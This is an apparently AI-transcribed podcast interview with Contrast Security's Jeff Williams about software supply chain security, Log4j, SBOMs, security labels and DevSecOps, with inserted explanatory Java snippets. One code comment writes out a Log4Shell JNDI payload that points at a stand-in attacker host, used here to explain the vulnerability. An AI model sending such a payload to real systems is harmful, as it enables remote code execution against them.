
Improving The Market With Higher Security

In this episode of Cybersecurity (Marketing) Unplugged, Williams also discusses:

  • How working from home impacts software development and security;
  • The executive order: zero trust, security labels and creating visibility in the market;
  • Company mandates and making the market more competitive by achieving a higher level of security.

Jeff Williams is the co-founder and CTO of Contrast Security, the industry’s most modern and comprehensive code security platform that removes security roadblock inefficiencies and empowers enterprises to write and release secure application code faster. Williams founded, set up and kicked off the Open Web Application Security Project (OWASP) Foundation, a non-profit online community that produces freely available articles, methodologies, documentation, tools and technologies in the field of web application security.

Contrast Security serves tens of thousands of developers in some of the largest brand name companies in the world, including BMW, DocuSign, Zurich and the American Red Cross, as well as other leading global Fortune 500 enterprises. Contrast also partners with AWS, IBM, Google, Microsoft and VMware, bringing security into cloud applications. For over 25 years, Williams’s passion has been improving the security of the world’s software.

I think it’s people’s right to understand the security of the products that they’re using, and software is the most black box of a product. You can imagine it’s very difficult to tell whether the software is secure or not. From a user perspective, it’s not like a car where you can take it to the shop and they can fix it in a few minutes…. Detecting these vulnerabilities is super hard. So we need to put incentives in place for companies to do the right thing, to build security programs that ensure the security of their code and then disclose what they did.

Full Transcript

This episode has been automatically transcribed by AI; please excuse any typos or grammatical errors.

Steve King  00:13

Good day, everyone. I’m Steve King, the managing director of CyberTheory. Today’s episode is going to focus on DevSecOps. Joining me today is Jeff Williams, the co-founder and CTO of Contrast Security, the industry’s most modern and comprehensive code security platform that removes security roadblock inefficiencies and empowers enterprises to write and release secure application code faster. Jeff is also the guy who founded, set up and kicked off the OWASP Foundation. Contrast serves tens of thousands of developers at some of the largest brand name companies in the world, including folks at BMW, DocuSign, Zurich and the American Red Cross, as well as numerous other leading global Fortune 500 enterprises. Contrast also partners with AWS, IBM, Google, Microsoft and VMware to bring security into cloud applications. So welcome, Jeff. I’m glad you could join me today.

Jeff Williams  01:17

Thanks, Steve. Great to be here.

Steve King

Can you talk to us about the use of open source software in the development process? It’s pretty timely that we have that question and discussion, given what’s happened in the last seven days or so.

Jeff Williams

Yeah, well, I mean, it’s huge. It’s so widely used, it’s so massive. When I started doing AppSec, we would see apps that had, you know, a handful of libraries, and developers would download them and use them. Today, it’s completely changed. It’s so automated: a developer includes one library in their application declarations, and then it pulls in all these transitive dependencies. So one library depends on another, which depends on another. We see applications with hundreds, sometimes a thousand libraries. That visual image is frightening, because, you know, you look at something like Log4j, which is all in the news this week, and you realize there are three guys maintaining that piece of software that’s propping up most of the internet. You know, Java is probably more than half of the interesting critical applications that are out there, and it’s relying on Log4j, which, you know, now has this devastating vulnerability.
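
To make that fan-out concrete, here is a toy sketch in Java. It is not a real dependency resolver, and all the artifact names are hypothetical; it only illustrates how declaring a single library can pull a whole tree of transitive dependencies into an application.

```java
import java.util.*;

// Toy illustration (not a real resolver): how one declared library can fan
// out into a much larger set of transitive dependencies. All names are made up.
public class TransitiveClosure {

    public static Set<String> resolve(String root, Map<String, List<String>> deps) {
        Set<String> seen = new LinkedHashSet<>();
        Deque<String> work = new ArrayDeque<>();
        work.push(root);
        while (!work.isEmpty()) {
            String current = work.pop();
            for (String dep : deps.getOrDefault(current, List.of())) {
                if (seen.add(dep)) {   // visit each library only once
                    work.push(dep);
                }
            }
        }
        return seen;
    }

    public static void main(String[] args) {
        Map<String, List<String>> deps = Map.of(
            "my-app",        List.of("web-framework"),
            "web-framework", List.of("logging-lib", "json-lib"),
            "json-lib",      List.of("reflection-utils"),
            "logging-lib",   List.of());
        // The developer declared one dependency, but ships four libraries.
        System.out.println(resolve("my-app", deps));
    }
}
```

The developer declared a single dependency, yet the resolved set that ships with the application contains four libraries; that dynamic is what lets a deep dependency like Log4j end up almost everywhere.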

Steve King  02:37

Okay, it would appear to some of us that this whole work-from-home thing is here to stay. How much of an impact does it have on software development and security?

Jeff Williams  02:49

Well, look, I think most developers were already capable of working from home, even pre-COVID. And, you know, I think it’s a good opportunity to put some more controls around that part of the supply chain. One of the things that SolarWinds pointed out was that if you compromise the development environment, whether it’s the build server or any of the other tools that are used to create code, the editors and plugins and testing tools and so on, then an attacker who gets into that can Trojan the code that you’re creating and affect all of your downstream customers. So it’s really a critical piece to get right. I think we’ve seen a lot more moving of that infrastructure to the cloud, so now applications are built using cloud tools, and that’s an opportunity to put controls around them and rely less on, you know, the individual developer and their laptop. That shouldn’t be the machine that’s responsible for pushing critical software into the repositories where people end up using it, because who knows what’s on that laptop. I mean, developers download all kinds of stuff; maybe their kids are playing Minecraft on it. That shouldn’t be part of, you know, critical software supply chain infrastructure.

Steve King  04:07

However, it appears as though it is, and it’s almost impossible, given what we’ve just described, to sort of ferret out. What’s the game plan for the future? How do we avoid these kinds of attacks going forward?

Jeff Williams  04:24

Well, for SolarWinds and other related kinds of attacks, I think what we need to do is maintain integrity between the source code that gets created and what we ship. A developer can use whatever tools they want to write that code and commit it into a repo. But then, after all the build processes happen and we finally get an executable that we’re about to push into a code repo, we should check to make sure that binary matches the code that we committed in the first place. If it doesn’t, something went haywire in the middle, during that build process somewhere, and we need to figure out why there’s that integrity mismatch, if you will.
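
As a rough sketch of that integrity check, the snippet below hashes the binary that came out of the build and compares it with a digest recorded out-of-band for the expected artifact. The file paths are hypothetical, it assumes Java 17+ for HexFormat, and a full reproducible-build check would go further by rebuilding from the committed source before comparing.

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.util.HexFormat;

// Minimal sketch: hash the built binary and compare it with a digest recorded
// separately for the artifact we expected to produce. Paths are hypothetical.
public class BuildIntegrityCheck {

    static String sha256Hex(Path file) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        byte[] digest = md.digest(Files.readAllBytes(file));
        return HexFormat.of().formatHex(digest);
    }

    public static void main(String[] args) throws Exception {
        Path artifact = Path.of("target/app.jar");          // what the build produced
        Path expected = Path.of("release/app.jar.sha256");  // digest recorded out-of-band

        String actual = sha256Hex(artifact);
        String recorded = Files.readString(expected).trim();

        if (!actual.equalsIgnoreCase(recorded)) {
            // Integrity mismatch: stop the pipeline and investigate the build.
            throw new IllegalStateException("Artifact digest does not match expected value");
        }
        System.out.println("Artifact digest verified: " + actual);
    }
}
```

In practice a check like this would run as the last gate in the pipeline, before anything is pushed to the repository that people end up downloading from.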

Steve King  05:11

We’ve seen a bunch of executive orders around this from the administration here in the last, what, 90 days, I guess, the SBOM being one of them. What impact do you think that’s going to have on DevSecOps? And how important is the SBOM to the larger problem? I mean, for example, if we had a software bill of materials around SolarWinds, would it have been able to help us spot it?

Jeff Williams  05:41

No, well, no, probably not. But the executive order, I think, is really strong. It’s broad, and it’s visionary; it’s got an aggressive model to change the way that the software market works. And really, I think that’s the key to fixing all the security problems that we’ve had in application security, because it focuses on making application security visible. The executive order pushes for kind of three things: something called zero trust, which I’m sure you’ve talked about with other guests; application security testing, which is where I spend most of my time; and SBOMs and software security labels. All those things, I think, help to create visibility in the market, and that will allow consumers to make informed decisions about the software that they use. So imagine, when you go to sign up for an online bank, there was a sticker in the window that said, hey, this is, you know, a C, or some other rating scheme that would tell you this isn’t the most trustworthy software. It’s kind of like the restaurants in New York City, where you go and you can see, hey, this one’s a C, or a B, or an A. You’re probably going to want to do your online banking at an A, and that letter grade would sort of represent the kind of security work that was put into making sure that code was correct. And I think that’s where we’re headed. You know, Singapore and Finland already have software security labels mandated, and it’s working. And one part of this executive order is for NIST to go investigate setting up a program like that for the United States. That’s really exciting.

Steve King  07:27

Is this going to be the governing body that makes that determination and then creates those labels, like the FDA does for food?

Jeff Williams  07:36

NIST will probably create the standards that drive the program forward. Right now, they’re sort of looking at coming up with a design of a program that could work at, you know, United States software scale, and that’s a little tricky. I’ve submitted a bunch of input to that, and I spoke at their workshop on it. But they’ll come up with the standards, and then I suspect there will probably be another agency, or maybe some part of another agency, to actually execute on that program.

Steve King  08:12

How important is threat modeling in that process?

Jeff Williams  08:15

I’m really glad you asked about that. One of the other standards that NIST issued under the executive order is a minimum standard for application security testing, and in that standard, they require threat modeling. They also require the use of a bunch of different kinds of application security testing tools, and they require fixing the problems that are found by those tools. So it’s actually a much more rigorous program than what we had in the past, which was basically: you have to use a testing tool, but you’re not required to fix anything, and there’s no threat modeling, so we don’t know that you’re testing the right stuff. So I think this is a big step forward. And threat modeling has, over the last two years, become much more important. It’s now part of the PCI software security standard, so you’re required to do it there. It’s also part of the latest OWASP Top 10, which is required by a number of organizations and other standards. So I think organizations should really be looking at threat modeling as something that they need to be doing, and if they’re not doing it, which is a lot of companies, then they need to start a program and really get that process working.

Steve King  09:29

So what are your thoughts on mandates generally? I mean, what we’re talking about here, essentially, are mandates around companies that do business with the federal government, for the most part, I believe. And what about everybody else that isn’t part of that supply chain? When and how is the government going to insist, regardless of whether or not you’re part of that contractual supply chain, that you have to do these things as well?

Jeff Williams  10:08

Yeah, I mean, you know, generally, I’m not a fan of lots of regulation. But when there is a genuine market failure, then I think it’s what has to happen, and the software market is broken. Consumers don’t have enough information to make informed decisions about the software that they’re buying; it’s very difficult to get that information, and the producer is in the best position to generate that information and share it. So in terms of the kinds of mandates that we could put on companies, you know, we could create tax incentives, we could create tax penalties for insecure software, we could create criminal liability for insecure software and put developers in jail. There’s a ton of things that we could do. So I think the approach that the executive order takes, by mandating visibility and transparency, is the least intrusive way of achieving the goals here, so that we can fix the market. The market can then be competitive about how much security is right for the market and achieve a much better level of security. And I think, you know, putting it on government agencies has a broad blast radius. It’s going to affect lots of companies that do some business with the government and also do business with the private sector, so it’s going to affect a lot of people, and I think it’ll drag the rest of the market with it.

Steve King  11:41

That’s an interesting idea. The challenge, it seems to me, among many challenges here, but one of the primary ones, would seem to be this: how do you ensure that the folks in DevSecOps are actually vetting those software components, back to open source again, that have multiple different library dependencies in the wild? I don’t even know how you would go about doing that.

Jeff Williams  12:11

Well, you know, I think the right thing is to create visibility and enable consumers to choose software that has the right things, so that they can check to see: hey, did you make sure all the libraries have no known vulnerabilities? Did you do security testing? Was this threat modeled? What threats are you defending against? Are your developers trained in security? We can make all those kinds of things visible to consumers. And then, you know, there may be penalties for lying on those labels. If you intentionally mislead folks, you can imagine penalties around that.

Steve King  12:51

It’s a tough question; there’s no easy way. You know, we see what happens when there are no consequences for criminal behavior. We’re seeing that in major cities throughout the country right now. It’s hard for me to connect the dots between consequences, intentional or otherwise, for code released without the required diligence.

Jeff Williams  13:17

I don’t think that companies will allow their software to go out the door with a label on it, or an SBOM or anything else, that says their software has major security problems. Labels change markets. If you look at almost every other product out there, there are labels for it, right? We have labels on cars and drugs and food and videos and record albums. My water heater has an Energy Star label that tells me facts that I need to understand about its energy use. And software shouldn’t be different.

Steve King  13:55

Right, especially in an age where our world is digital. So we have a larger responsibility, do we not?

Jeff Williams  14:06

I think it’s people’s right to understand the security of the products that they’re using. And software is like the most black box of a product you can imagine; it’s very difficult to tell whether software is secure or not from the user perspective. It’s not like a car, where you can take it to the shop and in a few minutes they can tell you, oh, that’s a pretty good car. Software is millions of lines of code, and many millions of lines of library code, all combined together in a big mess, and, you know, detecting these vulnerabilities is super hard. So we need to put incentives in place for companies to do the right thing, to build security programs that ensure the security of their code, and then disclose what they did, so that as a consumer you can choose from providers that do software the right way.

Steve King  14:57

Yeah, and consumers don’t seem to care one way or the other, because we have the inverse of that right now. You know, it’s not a warning label, it’s a terms-of-use label. It says you accept all liability and all bets are off. And people happily click the “I have read and understood and agree” box, regardless of whether they have read, understood or agreed, in order to simply have access to whatever the tool or application is.

Jeff Williams  15:31

Exactly, it’s a symptom of this, you know, the blind risk that users are taking all the time, because you have no idea whether the online banking application you’re using to manage your finances is any good or not.

Steve King  15:48

So, talk to our listeners about the differences between application security testing and code testing, and in what ways you deal with third-party open source code.

Jeff Williams  16:02

Sure. So I’ll differentiate between quality testing and security testing, and then talk about how we do them together. Automated quality testing is a big part of DevOps. The goal there is to create a pipeline that automatically ensures the quality of the code as it’s getting built. Putting that in place will allow you to iterate much faster: you can write little pieces of code, push them to the pipeline, get them all tested and deploy quicker. Security testing, unfortunately, has traditionally been mostly manual and mostly pushed late in the process, typically right before deployment. And so it’s kind of messing up DevOps, because the process will work, the application will get built, it’s about to go to production, and security intervenes and says, hey, you can’t push that to production because we think there’s a vulnerability. And it’s been a noisy process; it’s slow and requires a lot of expertise, as I talked about before. So traditionally, security has been kind of at odds with high-speed development. What we spend our time on is trying to make security testing compatible with QA testing, so that as you run your normal automated tests in your pipeline, security testing is going on in the background, automatically. And, you know, we build that right into the environment so that you don’t have to do anything but build, test and deploy your code, and the end result is you get something that’s QA tested and security tested, and that aligns those two groups together. Now, regarding third-party open source components, you know, that Log4j thing is a great example of why we need to stay on top of open source code. But it’s not really a separate problem from quality testing and security testing; you really have to test the whole application altogether. You don’t want to analyze the custom code separately from the libraries with different tools, because it’s one app, it’s one thing. To test the custom code, you have to understand what libraries it’s using, and to test the libraries, you have to understand how the code uses those libraries. So we think the best approach there is to get tools that analyze both the code and the libraries all together. That’s when vulnerabilities like this Log4Shell vulnerability become visible. Really, for that vulnerability, it’s not just a library problem; developers putting untrusted data into logging APIs is also required for it to be exploited. So there’s a piece that’s got to be custom code, and there’s a piece that’s how the libraries you’re using work, and you need all of that to work together.
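
Williams’s point that Log4Shell needed both the library flaw and custom code can be shown in a few lines. The sketch below assumes the Log4j 2 API (log4j-api) is on the classpath; the class and method names are hypothetical.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// The library bug (CVE-2021-44228) only became exploitable where application
// code logged attacker-controlled input, because unpatched Log4j 2 versions
// (before 2.15.0, default configuration) evaluated ${jndi:...} lookups found
// inside log messages.
public class LoginAudit {

    private static final Logger log = LogManager.getLogger(LoginAudit.class);

    // Risky pattern: the User-Agent header is attacker-controlled. A value like
    // "${jndi:ldap://attacker.example/a}" could trigger remote code execution
    // on a vulnerable Log4j 2 version.
    public void recordLogin(String username, String userAgent) {
        log.info("Login for {} from client {}", username, userAgent);
    }
}
```

The remediation is upgrading to a patched Log4j 2 release rather than trying to filter log messages, but a tool that sees both this call site and the vulnerable library version together is what makes the combined risk visible, which is the argument for analyzing custom code and libraries as one application.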

Steve King  18:53

In your estimation, what percentage of, you know, just private business actually does what you describe today?

Jeff Williams  19:01

Well, there are a number of organizations that are getting really good at this. They’ve built security into their automated pipeline, and every time they change the code, it goes through the pipeline and gets both QA tested and security tested. They establish a fast feedback loop right back to developers so developers can quickly fix that code. And I’ll challenge your listeners to think about how long that feedback loop takes. They call that the mean time to remediate, and with the traditional approach to security, with these expert tools, the mean time to remediate is 315 days, which is way too long. With modern tools we can cut that down to a week, or a day in some cases. Companies like Comcast have been really vocal about how they’ve established that process and how well it’s working, and ultimately they end up saving a ton of money because they don’t have to carry around this huge backlog of vulnerabilities, which is expensive. But I’d say, look, it’s still the minority of big companies that are doing this. You know, I’d like to think Contrast customers are at the top end of that scale: we’ve reduced the mean time to remediate across all of our customers to eight days, and we’re continually trying to push that down. We think that’s a great number. But it’s something that I think is critical to succeeding in the marketplace for almost every industry. The companies that master this, that are best at producing high-quality, high-security code in a very agile manner, able to quickly change and adapt, those are the companies that are going to win in every sector. That’s what people mean when they say software is eating the world: the companies that are great at software will win. And so the ones that are really trying to compete, trying to be the best in their sector, they’re the ones that are getting great at this.
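
The metric Williams cites, mean time to remediate, is simply the average gap between finding a vulnerability and shipping the fix. A minimal sketch with hypothetical dates:

```java
import java.time.LocalDate;
import java.time.temporal.ChronoUnit;
import java.util.List;

// Minimal sketch with made-up findings: mean time to remediate is the average
// number of days between discovering a vulnerability and fixing it.
public class MeanTimeToRemediate {

    record Finding(LocalDate found, LocalDate fixed) {}

    static double mttrDays(List<Finding> findings) {
        return findings.stream()
                .mapToLong(f -> ChronoUnit.DAYS.between(f.found(), f.fixed()))
                .average()
                .orElse(0.0);
    }

    public static void main(String[] args) {
        List<Finding> remediated = List.of(
                new Finding(LocalDate.of(2021, 11, 1), LocalDate.of(2021, 11, 9)),
                new Finding(LocalDate.of(2021, 12, 10), LocalDate.of(2021, 12, 17)));
        System.out.printf("Mean time to remediate: %.1f days%n", mttrDays(remediated));
    }
}
```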

Steve King  21:09

I’m conscious of the time here, and I want to get in a final question. I think it could be around digital transformation. It seems like DT is pushing the entire security ecosystem into what I call uncomfortable contortions. The question is: are we going too fast, pushing too hard toward digital transformation? And if so, what can we do to pump the brakes a bit so folks can, you know, catch up digitally, from a DevSecOps point of view?

Jeff Williams  21:45

Yeah, well, you know, adopting new technologies fast without thinking about the security consequences, and kind of waiting until the technologies are widely deployed to really get security researchers digging into them and looking at them, probably isn’t a super healthy process. However, I don’t think there’s much we can do about it. Development is under huge amounts of pressure from the business to innovate and push forward faster, so it’s really up to security to change the way that we do security. We have to adapt to the environment. Traditional security is slow; it’s got a lot of big, heavyweight processes that reflect very sort of waterfall thinking. We need to change this, we need to adapt, and focus on the biggest threats: make sure that our defenses are in place, that we’ve tested those defenses to make sure they’re correct and effective, and that we make that evidence visible so everyone can see how secure things are. And then we need runtime protection in production, to make sure that we can see attacks and respond quickly when we are attacked. But it’s a transformation that has to happen to security, and security folks are resisting that change. They like lots of requirements, and they like big monolithic efforts, like building a security architecture and doing a pen test, big processes that cover the whole scope of threats from the biggest threats all the way to the littlest threats. And it doesn’t make sense. We’ve got to shatter those old processes and focus on one threat at a time, really narrow, really agile, to get the best results.

Steve King  23:34

Yeah, I’m not sure that I can find too many CISOs that would agree with you that they’re fond of big monolithic efforts. I think they’re fond of trying to do their jobs, which is to make their world a safer place to be for their customers and stakeholders and shareholders, etc. And perhaps, from your point of view, and it makes sense, Contrast is part of the calculus that will get them there more quickly. And from that point of view, I guess that’s sort of what your message to the market is, right?

Jeff Williams  24:14

Yeah, we’ve got a unique platform that supports, you know, all three of the major challenges in AppSec: there’s a challenge around writing secure code, there’s a challenge around the supply chain, and there’s a challenge around runtime operations security at the application layer. And we’ve got a unified platform with the newest AppSec technologies in all three of those areas that you can add to your company. I think we’re a platform that you can build a modern application security practice on. So, you know, that’s why we’re here; that’s what we do.

Steve King  24:50

Yeah. Well, it sounds terrific, and I urge folks to check it out. We’re out of time today, however, so I wanted to thank our guest Jeff Williams again for taking time out of his schedule to join us in what I thought was a thought-provoking exchange around some of the major problems in getting to where we want to be from a secure operating environment perspective. Thanks, Steve. Appreciate it. And thank you to our listeners for joining us in another one of CyberTheory’s unplugged reviews of the wild world of cybersecurity technology and our new digital reality. Until next time, I’m your host, Steve King, signing out.